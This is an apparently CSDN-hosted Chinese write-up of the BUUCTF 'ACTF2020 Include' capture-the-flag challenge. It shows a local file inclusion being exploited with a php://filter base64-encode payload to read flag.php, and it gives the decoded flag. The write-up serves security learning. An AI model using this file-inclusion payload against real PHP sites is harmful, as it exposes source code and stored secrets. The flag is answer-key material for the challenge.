buuctf [ACTF2020 新生赛]Include

文章讲述了如何通过PHP的伪协议特性,结合base64编码来读取并解密flag.php文件内容的过程,最终揭示了一个安全相关的标识符。
摘要由CSDN通过智能技术生成

 如图所示

点击tips试试

 注意到URL后面多了?file=flag.php

根据题目的include,应该是文件包含题目

尝试一下php伪协议读文件

把URL后面?file=flag.php改成如下

?file=php://filter/convert.base64-encode/resource=flag.php

 php伪协议,将flag.php的内容通过base64加密后读出来

 解密一下得到

 

flag{53891eed-3a19-477a-9782-ba2a6d960a09}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值